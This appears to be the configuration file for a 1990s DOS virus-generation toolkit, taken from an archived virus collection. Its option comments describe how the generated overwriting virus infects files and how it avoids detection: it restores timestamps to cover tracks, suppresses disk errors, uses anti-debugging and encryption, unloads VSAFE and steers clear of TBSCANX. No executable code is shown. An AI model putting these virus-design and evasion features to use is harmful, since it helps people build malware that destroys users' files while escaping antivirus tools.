home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / VIRDCOLL.ZIP / OVCT.ZIP / OVCT.CFG < prev    next >
Text File  |  1997-04-12  |  3KB  |  77 lines

  1. #
  2. # Configuration file for Overwritting Virus Creation ToolKit by Virtual Daemon
  3. #
  4.  
  5. # Output File Name (no extension, please! - extension is set to .ASM)
  6. #   This file will be generated by OVCT as the source code file.
  7. F='TaRgEt'
  8.  
  9. # Virus Name
  10. #   The virus name will apear directly in the virus.
  11. #   Don't use ' or " in the name!
  12. N='Example'
  13.  
  14. # Virus Author
  15. #   See Virus Name...
  16. A='Virtual Daemon'
  17.  
  18. # Check If Already Infected? [Y/N]
  19. #   If selected, the virus will check to see if the file was already infected.
  20. C=Y
  21.  
  22. # Number Of Files To Infect Per Run (Max. 9)
  23. #   How many files to infect in 1 run. The value is between 0 and 10.
  24. I=3
  25.  
  26. # Restore File Attributes? [Y/N]
  27. #   If selected, after infection the original attributes of the victim will be
  28. #   restored. This is a very good way in covering your tracks.
  29. R=Y
  30.  
  31. # Restore File Time/Date? [Y/N]
  32. #   If selected, after infection the original file/date of the victim will be
  33. #   restored. Also, a very good way in covering your tracks.
  34. T=Y
  35.  
  36. # Use INT24h Handler? [Y/N]
  37. #   If selected, OVCT will generate a short critical error handler. The handler
  38. #   prevents Abort, Retry, Fail messages by taking over the Int 24h. This is
  39. #   very usefull with write-protected diskettes, because the virus will not
  40. #   generate an error when attempting to write on one.
  41. H=Y
  42.  
  43. # Change Directory For More Infection? [Y-To Parent/N]
  44. #   If selected, when all the files from current directory were already 
  45. #   infected, or there weren't enough files to infect, or no files in current 
  46. #   directory were found, the virus will change the directory to parent ('..')
  47. #   and will try to infect files from parent directory. When infection is over
  48. #   the virus will restore the original directory.
  49. D=Y
  50.  
  51. # Allow Infection Of COMMAND.COM? [Y/N]
  52. #   If not selected the virus won't infect COMMAND.COM!
  53. L=Y
  54.  
  55. # Anti-Debugger Routines? [Y/N]
  56. #   If selected, the virus will be debugger-resistant.
  57. B=Y
  58.  
  59. # Encryption? [Y/N]
  60. #   If selected, the virus will be encrypted with a random key.
  61. E=Y
  62.  
  63. # Allow Zero Key? [Y/N]
  64. #   If selected, the virus may remain unencrypted if the key=0. Else the virus
  65. #   will compare the random key with zero, and if equal will find another 
  66. #   value.
  67. K=N
  68.  
  69. # Anti-VSAFE Routine? [Y/N]
  70. #   If selected, the virus will Un-Install Microsoft's VSAFE from memory.
  71. S=Y
  72.  
  73. # Anti-TBSCANX Routine? [Y/N]
  74. #   If selected, the virus will check if TBSCANX is resident, and if it is it 
  75. #   won't execute the virus, because you might get caught!
  76. X=Y
  77.